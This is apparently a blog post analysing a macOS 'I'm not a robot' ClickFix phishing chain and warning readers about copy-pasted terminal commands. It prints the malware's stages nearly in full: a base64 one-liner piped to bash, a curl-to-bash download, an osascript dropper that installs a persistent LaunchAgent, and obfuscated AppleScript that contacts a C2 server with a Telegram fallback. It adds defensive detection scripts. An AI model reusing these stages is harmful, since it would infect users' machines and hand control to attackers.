annyoung


Category: 분석생활

I'm not a robot phishing

nopsled 2026. 4. 10. 10:56

A website told me to run something in a terminal to prove I'm not a robot, so I got curious about what it would actually do and took a quick look.
echo "Y3VybCAtcyAnaHR0c***[REMOVED]***2gnIHwgYmFzaA==" | base64 -d | bash

The copied content was as above. It decodes the base64-encoded string and pipes the result into a bash shell; decoding it gives the following.
curl -s 'https://***[REMOVED]***.digital/script.sh' | bash

This time curl is given the -s option, which is silent mode (no progress output); it downloads script.sh and runs it in bash, and what runs is the following.
osascript -e "$(echo "ZG8gc2hlbGwgc2***[REMOVED]***+DQo8L3BsaXN0Pg0=" | base64 -d)"

Using osascript's (AppleScript) -e (execute) option, it decodes the base64-encoded blob and runs it.
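Before running anything copied from a page like this, the safe move is to decode the layers and read them. The following is an added example (not from the original post) that peels each echo | base64 -d | interpreter stage without executing it and flags the behaviours seen above; the domain and plist label in its samples are constructed placeholders.

```python
import base64
import re

# Shape seen in the post, both in the clipboard one-liner and inside the LaunchAgent:
#   echo "<base64>" | base64 -d | bash      echo '<base64>' | base64 -d | osascript
STAGED = re.compile(
    r"""echo\s+["']?([A-Za-z0-9+/=]+)["']?\s*\|\s*base64\s+(?:-d|-D|--decode)\s*\|\s*(bash|sh|zsh|osascript)"""
)
# Behaviour a "prove you are human" step never needs; each hit is a reason to stop
RISK = {
    "remote_script_to_shell": re.compile(r"\b(curl|wget)\b.*\|\s*(bash|sh|zsh)\b"),
    "applescript_exec": re.compile(r"\bosascript\b|\bdo shell script\b"),
    "persistence": re.compile(r"LaunchAgents|LaunchDaemons|launchctl\s+(load|bootstrap)"),
}

def peel_stages(text: str, max_depth: int = 5) -> list:
    """Decode each echo|base64|interpreter layer in turn, never executing any of them."""
    stages, current = [], text
    for _ in range(max_depth):
        m = STAGED.search(current)
        if not m:
            break
        payload = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        stages.append({
            "interpreter": m.group(2),
            "payload": payload,
            "flags": [name for name, rx in RISK.items() if rx.search(payload)],
        })
        current = payload            # the decoded text may itself be another stage
    return stages

def _stage(inner: str, interp: str) -> str:
    return "echo '%s' | base64 -d | %s" % (base64.b64encode(inner.encode()).decode(), interp)

# Constructed samples (placeholder domain and label, not the post's real values)
CLIPBOARD_SAMPLE = _stage("curl -s 'https://attacker.example.invalid/script.sh' | bash", "bash")
LAUNCHAGENT_SAMPLE = _stage(
    _stage('do shell script "launchctl load ~/Library/LaunchAgents/com.placeholder.plist"', "osascript"),
    "bash")

if __name__ == "__main__":
    for sample in (CLIPBOARD_SAMPLE, LAUNCHAGENT_SAMPLE):
        for depth, s in enumerate(peel_stages(sample), 1):
            print(f"stage {depth} -> {s['interpreter']}: {s['payload']!r} flags={s['flags']}")
```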
do shell script "
SCRIPT_PATH=\"$HOME/Library/jaqyeseegglnlxbj\";
mkdir -p \"$HOME/Library/LaunchAgents\";
cat > \"$HOME/Library/LaunchAgents/com.jaqyeseegglnlxbj.plist\" <<END_PLIST
<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
  <dict>
    <key>Label</key>
    <string>com.jaqyeseegglnlxbj</string>
    <key>KeepAlive</key>
    <true/>
    <key>RunAtLoad</key>
    <true/>
    <key>ProgramArguments</key>
    <array>
        <string>/bin/bash</string>
        <string>-c</string>
        <string>echo 'c2V0IF9xV3NNWVQ0eiB0***[REMOVED]***gplbmQgaWY=' | base64 -d | osascript</string>
    </array>
  </dict>
</plist>
END_PLIST
"
do shell script "launchctl unload ~/Library/LaunchAgents/com.jaqyeseegglnlxbj.plist 2>/dev/null"
do shell script "launchctl load ~/Library/LaunchAgents/com.jaqyeseegglnlxbj.plist"

It registers this as a daemon (a LaunchAgent, as the plist path shows) so that the binary is executed automatically whenever the computer is turned on; the agent runs bash with the -c (command) option, which decodes the base64-encoded string and runs it through osascript once more.
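To check whether a Mac already carries an agent like the one above, the plist can be parsed and judged on the traits the dropper leaves behind. This is an added example, not code from the post; the label, paths and base64 string in its sample plists are constructed placeholders.

```python
import plistlib
import re
from pathlib import Path

# Constructed plist with the same layout as the one the script writes (label is a placeholder)
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.placeholderlabel</string>
  <key>KeepAlive</key><true/>
  <key>RunAtLoad</key><true/>
  <key>ProgramArguments</key>
  <array><string>/bin/bash</string><string>-c</string>
  <string>echo 'UExBQ0VIT0xERVI=' | base64 -d | osascript</string></array>
</dict></plist>"""

# Constructed benign agent for comparison
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>RunAtLoad</key><true/>
  <key>ProgramArguments</key>
  <array><string>/usr/local/bin/backup</string><string>--nightly</string></array>
</dict></plist>"""

SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "bash", "sh", "zsh"}
DECODE_AND_RUN = re.compile(r"base64\s+(?:-d|-D|--decode)\s*\|\s*(osascript|bash|sh|zsh)")
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(bash|sh|zsh)\b")

def assess_launch_agent(raw: bytes) -> dict:
    """Parse one LaunchAgent plist and list the traits it shares with the dropper above."""
    pl = plistlib.loads(raw)
    args = pl.get("ProgramArguments", [])
    cmd = " ".join(args)
    reasons = []
    if args and args[0] in SHELLS and "-c" in args[1:]:
        reasons.append("shell -c wrapper instead of a program path")
    if DECODE_AND_RUN.search(cmd):
        reasons.append("base64 payload decoded into an interpreter")
    if FETCH_AND_RUN.search(cmd):
        reasons.append("remote script piped into a shell")
    if pl.get("RunAtLoad") and pl.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive (relaunched if killed)")
    return {"label": pl.get("Label"), "suspicious": bool(reasons), "reasons": reasons}

def scan_launch_agents(directory: Path = Path.home() / "Library" / "LaunchAgents") -> list:
    """Assess every plist in a LaunchAgents directory; a missing directory gives an empty list."""
    return [assess_launch_agent(p.read_bytes()) for p in sorted(directory.glob("*.plist"))]
```

Calling scan_launch_agents() with no argument walks the current user's ~/Library/LaunchAgents, which is where the script above drops its plist.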
set _qWsMYT4z to "hqCnS8YTVCQx0"
set _m2i0igRQy to "XtiNS5rmLuWcE"
set __xbFfmLcXA to (475 + 350) * 7
set __wb3jlMkzPTd to 168.2011
property ***[REMOVED]*** : {((character id 112) & ***[REMOVED]*** & (ASCII character 99) & "f" & "d")}
property ***[REMOVED]***: ""
property ***[REMOVED]***: ("f0" & ***[REMOVED]*** & (ASCII character 100) & (character id 101) & (character id 52) & "a" & "9" & (character id 54) & (character id 50) & (character id 48) & (ASCII character 50) & (character id 57) & "b66" & "ed" & (character id 56) & (character id 53) & (ASCII character 101))
property ***[REMOVED]*** : ""

on __ORuyqOlns5()
    repeat with _PfgtcEkdQ in __Ec0tcgIh
        set _cMKkcc1N to (contents of _PfgtcEkdQ)
        set __kSC4ZSAG7 to ((ASCII character 104) & "t" & (ASCII character 116) & "p" & (ASCII character 58) & (ASCII character 47) & (character id 47)) & _cMKkcc1N & (character id 47)
        try
            set __apV8lF0 to do shell script (***[REMOVED]***) & (character id 49) & "0 ") & quoted form of __kSC4ZSAG7
            if __apV8lF0 is ("s" & "u" & "c" & (character id 99) & "e" & "s" & (ASCII character 115)) then
                set __gXHhFRhSUW to ***[REMOVED]***
                return true
            end if
        end try
    end repeat
    try
        set _cMKkcc1N to ***[REMOVED]***(ASCII character 108) & (character id 32) & "-" & (character id 115) & (ASCII character 32) & "-" & (character id 45) & "co" & (character id 110) & "n" & (ASCII character 101) & (character id 99) & (character id 116) & (ASCII character 45) & (ASCII character 116) & (ASCII character 105) & "m" & (ASCII character 101) & (ASCII character 111) & "ut" & " " & (ASCII character 53) & (ASCII character 32) & (ASCII character 45) & "-" & (ASCII character 109) & "a" & (ASCII character 120) & "-" & (ASCII character 116) & (ASCII character 105) & (ASCII character 109) & (character id 101) & (ASCII character 32) & (ASCII character 49) & (ASCII character 48) & (ASCII character 32) & (ASCII character 104) & (character id 116) & "tps" & (ASCII character 58) & (character id 47) & "/" & "t." & (ASCII character 109) & (ASCII character 101) & "/" & "ax0" & "3b" & "o" & (ASCII character 116) & " | " & (character id 115) & (character id 101) & (character id 100) & (character id 32) & "-n " & (character id 39) & (ASCII character 115) & (ASCII character 47) & (ASCII character 46) & (character id 42) & "<" & (ASCII character 115) & "p" & "a" & (ASCII character 110) & " " & (character id 100) & (ASCII character 105) & (character id 114) & (character id 61) & (character id 34) & (character id 97) & (ASCII character 117) & "to" & (character id 34) & (character id 62) & (character id 92) & (ASCII character 40) & (ASCII character 91) & "^" & (character id 60) & (ASCII character 93) & (ASCII character 42) & (character id 92) & (character id 41) & "<" & (ASCII character 92) & (ASCII character 47) & (ASCII character 115) & (ASCII character 112) & (character id 97) & (character id 110) & ">" & "." & "*/" & (character id 92) & "1/" & (ASCII character 112) & (character id 39))
        set __kSC4ZSAG7 to (string id {104, 116, 116, 112, 58, 47, 47}) & _cMKkcc1N & (character id 47)
        set __apV8lF0 to do shell script ("/" & ***[REMOVED]*** & (ASCII character 117) & (character id 114) & (character id 108) & " " & (ASCII character 45) & (ASCII character 115) & " " & (ASCII character 45) & (character id 72) & (character id 32)) & quoted form of _c7Y0vxsS1J & (" " & "-" & (ASCII character 100) & (character id 32) & (ASCII character 34) & (character id 99) & "h" & (character id 101) & (ASCII character 99) & (character id 107) & (ASCII character 34) & " --" & "c" & "onn" & (ASCII character 101) & (ASCII character 99) & "t-t" & "ime" & "out" & (character id 32) & "5" & (character id 32) & (character id 45) & "-" & (ASCII character 109) & (character id 97) & "x" & (ASCII character 45) & "ti" & (ASCII character 109) & (character id 101) & (ASCII character 32) & (ASCII character 49) & "0" & (ASCII character 32)) & quoted form of __kSC4ZSAG7
        if __apV8lF0 is ((ASCII character 115) & "ucc" & (character id 101) & (character id 115) & (character id 115)) then
            set __gXHhFRhSUW to __kSC4ZSAG7
            return true
        end if
    end try
    return false
end __ORuyqOlns5

set _c7Y0vxsS1J to ((ASCII character 85) & (ASCII character 115) & (ASCII character 101) & "r-" & (ASCII character 65) & (ASCII character 103) & "e" & (character id 110) & "t: " & (character id 77) & (character id 111) & "zil" & (ASCII character 108) & (ASCII character 97) & (ASCII character 47) & (character id 53) & (ASCII character 46) & (ASCII character 48) & (ASCII character 32) & (character id 40) & "Mac" & "in" & (character id 116) & (ASCII character 111) & (character id 115) & "h" & ";" & (character id 32) & (ASCII character 73) & (character id 110) & "t" & "el" & (character id 32) & (ASCII character 77) & (character id 97) & (ASCII character 99) & " " & (character id 79) & "S" & (character id 32) & (character id 88) & " " & "1" & (character id 48) & (ASCII character 95) & "1" & (character id 53) & (ASCII character 95) & (ASCII character 55) & (ASCII character 41) & " A" & (character id 112) & (character id 112) & (ASCII character 108) & "e" & (ASCII character 87) & (ASCII character 101) & (character id 98) & (ASCII character 75) & (ASCII character 105) & (character id 116) & (ASCII character 47) & (ASCII character 53) & (character id 51) & (ASCII character 55) & (ASCII character 46) & (ASCII character 54) & (character id 55) & " " & (ASCII character 40) & (ASCII character 75) & (character id 72) & (ASCII character 84) & (character id 77) & (ASCII character 76) & (character id 44) & (character id 32) & (character id 108) & (character id 105) & (ASCII character 107) & (ASCII character 101) & (ASCII character 32) & "Gec" & "k" & (ASCII character 111) & (character id 41) & (character id 32) & "C" & (character id 104) & (character id 114) & "o" & (character id 109) & "e/1" & (ASCII character 52) & "5" & (character id 46) & (character id 49) & (ASCII character 46) & (character id 52) & (character id 46) & "1" & "1" & " " & (ASCII character 83) & (character id 97) & "f" & (ASCII character 97) & (ASCII character 114) & (character id 105) & (ASCII character 47) & 
(character id 53) & "37" & "." & "67")

if __ORuyqOlns5() then	
	set __Oxs1TXRuMan to (string id {99, 117, 114, 108, 32, 45, 115, 32, 45, 45, 99, 111, 110, 110, 101, 99, 116, 45, 116, 105, 109, 101, 111, 117, 116, 32, 53, 32, 45, 45, 109, 97, 120, 45, 116, 105, 109, 101, 32, 49, 48, 32, 45, 45, 114, 101, 116, 114, 121, 32, 51, 32, 45, 45, 114, 101, 116, 114, 121, 45, 100, 101, 108, 97, 121, 32, 50, 32}) & ((ASCII character 45) & (ASCII character 88) & (ASCII character 32) & (ASCII character 80) & (ASCII character 79) & (character id 83) & (ASCII character 84) & (character id 32)) & quoted form of __gXHhFRhSUW & (character id 32) & ((ASCII character 45) & (ASCII character 72) & (character id 32)) & quoted form of _c7Y0vxsS1J & (character id 32) & ((ASCII character 45) & (ASCII character 100) & (character id 32)) & quoted form of (((character id 116) & (ASCII character 120) & (ASCII character 105) & (character id 100) & (character id 61)) & _bHwoo7HIuGJ & ((character id 38) & (character id 98) & "m" & "o" & (ASCII character 100) & "ul" & (ASCII character 101))) & ((character id 32) & (character id 124) & (character id 32) & "o" & (ASCII character 115) & (character id 97) & (character id 115) & (character id 99) & "rip" & (character id 116))
    set __v8kRbKEqefd to do shell script __Oxs1TXRuMan
end if

The AppleScript above is what finally emerges, and it behaves as follows.
1) The __Ec0tcgIh function obtains the C2 domain and then attempts a connection

 -> It sends a request to the C2 server; if the response succeeds it takes that C2 URL, and if it fails it fetches an alternate domain through a Telegram bot and uses that as the C2 server (fallback C2)

2) _bHwoo7HIuGJ obtains the transaction ID

3) _c7Y0vxsS1J builds the User-Agent
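The string-building obfuscation above, (ASCII character N), (character id N) and (string id {...}) joined with &, can be folded mechanically. This added helper (not part of the original post) rewrites one line at a time and leaves variables and keywords in place; the sample lines are taken from the script above.

```python
import re

# The three ways the sample builds string pieces, plus ordinary "literals"
TOKEN = re.compile(r'\((?:ASCII character|character id) (\d+)\)|\(string id \{([\d, ]+)\}\)')
LIT = r'"((?:[^"\\]|\\.)*)"'                       # one AppleScript literal, escapes allowed
PAIR = re.compile(LIT + r'\s*&\s*' + LIT)          # "a" & "b"
WRAPPED = re.compile(r'\(\s*' + LIT + r'\s*\)')    # ( "ab" )

def _unq(s: str) -> str:
    return re.sub(r'\\(.)', r'\1', s)              # drop AppleScript backslash escapes

def _q(s: str) -> str:
    return '"' + s.replace('\\', '\\\\').replace('"', '\\"') + '"'

def _token_value(m) -> str:
    if m.group(1) is not None:                     # (ASCII character N) / (character id N)
        return chr(int(m.group(1)))
    return "".join(chr(int(n)) for n in m.group(2).split(","))  # (string id {..})

def deobfuscate(line: str) -> str:
    """Fold every literal & literal chain into one literal; variables and keywords stay."""
    line = TOKEN.sub(lambda m: _q(_token_value(m)), line)
    prev = None
    while prev != line:                            # repeat until nothing more folds
        prev = line
        line = PAIR.sub(lambda m: _q(_unq(m.group(1)) + _unq(m.group(2))), line)
        line = WRAPPED.sub(lambda m: _q(_unq(m.group(1))), line)
    return line

# Lines taken from the sample above (the variable names are the sample's own)
SAMPLE_LINES = [
    'set __kSC4ZSAG7 to ((ASCII character 104) & "t" & (ASCII character 116) & "p" & (ASCII character 58) & (ASCII character 47) & (character id 47)) & _cMKkcc1N & (character id 47)',
    'if __apV8lF0 is ("s" & "u" & "c" & (character id 99) & "e" & "s" & (ASCII character 115)) then',
    'set __kSC4ZSAG7 to (string id {104, 116, 116, 112, 58, 47, 47}) & _cMKkcc1N & (character id 47)',
]

if __name__ == "__main__":
    for raw in SAMPLE_LINES:
        print(deobfuscate(raw))
```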
In the end it receives data from the C2 server and executes something via AppleScript, but after I hit the C2 domain a few times, Cloudflare (CF) blocked me...
Bottom line: be careful what you copy and paste!
The web page displayed fetch("https://www.naver.com/favicon.ico"); and that is what I thought I was copying, but in reality it can directly execute malicious code like the above.
